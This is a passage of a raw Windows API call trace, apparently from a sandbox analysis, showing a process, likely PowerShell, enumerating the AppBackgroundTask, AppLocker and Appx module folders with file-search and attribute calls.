lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.657] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.659] CoTaskMemAlloc (cb=0x20e) returned 0x530340 [0264.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x530340, nSize=0x105 | out: lpBuffer="") returned 0x0 [0264.659] CoTaskMemFree (pv=0x530340) [0264.660] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0264.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.661] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.661] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0264.661] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0264.661] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0264.661] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.661] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0264.662] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0264.662] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.662] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0264.662] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0264.662] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0264.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.663] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0264.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.663] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0264.663] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0264.676] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.676] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.676] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0264.677] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0264.677] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.677] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0264.677] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0264.677] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.678] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.678] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0264.678] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.678] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.678] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0264.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.678] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.679] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0264.679] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0264.679] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.679] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.679] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0264.680] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0264.680] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.680] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0264.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.680] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0264.680] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0264.680] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.681] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.681] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0264.681] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0264.681] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0264.681] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.681] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.682] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.682] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0264.682] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0264.682] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.682] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.682] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0264.683] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0264.683] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, 